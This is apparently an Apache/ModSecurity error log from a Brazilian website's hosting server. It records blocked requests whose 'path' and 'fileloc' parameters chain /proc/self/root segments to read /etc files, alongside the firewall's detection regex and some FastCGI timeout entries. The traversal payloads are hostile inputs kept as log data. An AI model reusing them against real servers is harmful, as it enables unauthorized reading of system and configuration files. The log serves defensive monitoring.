[Mon Mar 16 22:15:30.463254 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.243.203:34448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirMu82sZHvlq4xgHqAsQAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:31.763453 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.243.203:34460] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirM6BJNF7axNlVR0W6XgAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:33.426883 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:34462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirNaBJNF7axNlVR0W6YAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:33.627435 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.243.203:34462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirNaBJNF7axNlVR0W6YQAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:37.626028 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.243.203:34468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirOQQohV2v-7oj5HG87QAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:51.125789 2026] [proxy_fcgi:error] [pid 29802:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:52904] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:15:51.126066 2026] [log_config:warn] [pid 29802:tid 140411590858496] (32)Broken pipe: [client 179.188.53.243:52904] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:15:52.189396 2026] [:error] [pid 2304:tid 140411607643904] [client 74.7.243.203:34476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirSMh3JZxwdBQwPYGydQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:56.631453 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:53922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirTO82sZHvlq4xgHqAuwAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:57.370880 2026] [:error] [pid 2304:tid 140411574073088] [client 74.7.241.46:55970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirTch3JZxwdBQwPYGyfgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:15:59.531712 2026] [:error] [pid 2305:tid 140411599251200] [client 74.7.243.203:53926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirTwQohV2v-7oj5HG88QAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:01.260823 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:54788] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirUaBJNF7axNlVR0W6dAAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:02.729894 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:54804] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirUqBJNF7axNlVR0W6eAAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:15.129866 2026] [proxy_fcgi:error] [pid 10831:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:53362] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:16:15.130123 2026] [log_config:warn] [pid 10831:tid 140411725141760] (32)Broken pipe: [client 179.188.53.243:53362] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:16:19.417010 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:56756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirY6BJNF7axNlVR0W6hQAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:24.867803 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:36936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiraO82sZHvlq4xgHqAxwAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:37.123378 2026] [proxy_fcgi:error] [pid 15568:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:53622] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:16:37.123600 2026] [log_config:warn] [pid 15568:tid 140411599251200] (32)Broken pipe: [client 179.188.53.243:53622] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:16:40.812186 2026] [:error] [pid 2304:tid 140411716749056] [client 74.7.243.203:34108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abireMh3JZxwdBQwPYGyqAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:42.624229 2026] [:error] [pid 2305:tid 140411624429312] [client 74.7.243.203:35406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiregQohV2v-7oj5HG9CQAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:44.126987 2026] [:error] [pid 2304:tid 140411557287680] [client 74.7.243.203:35420] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirfMh3JZxwdBQwPYGyrQAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:46.780955 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.243.203:35428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirfqBJNF7axNlVR0W6lgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:54.567129 2026] [mime_magic:error] [pid 2473:tid 140411741927168] (70014)End of file found: [client 74.7.241.46:59550] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd/system
[Mon Mar 16 22:16:55.560034 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.243.203:38820] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirhwQohV2v-7oj5HG9EAAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:16:59.057834 2026] [proxy_fcgi:error] [pid 10831:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:53874] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:16:59.058178 2026] [log_config:warn] [pid 10831:tid 140411708356352] (32)Broken pipe: [client 179.188.53.243:53874] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:16:59.522553 2026] [:error] [pid 2325:tid 140411624429312] [client 74.7.243.203:38826] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiri-82sZHvlq4xgHqBCQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:08.704279 2026] [:error] [pid 2473:tid 140411590858496] [client 74.7.243.203:36490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abirlKBJNF7axNlVR0W6qQAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 22:17:21.033864 2026] [proxy_fcgi:error] [pid 10831:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:54080] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:17:21.034171 2026] [log_config:warn] [pid 10831:tid 140411632822016] (32)Broken pipe: [client 179.188.53.243:54080] AH00646: Error writing to |/etc/httpd/logger
[Mon Mar 16 22:17:22.341624 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.243.203:36092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiroqBJNF7axNlVR0W6rgAAAAY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
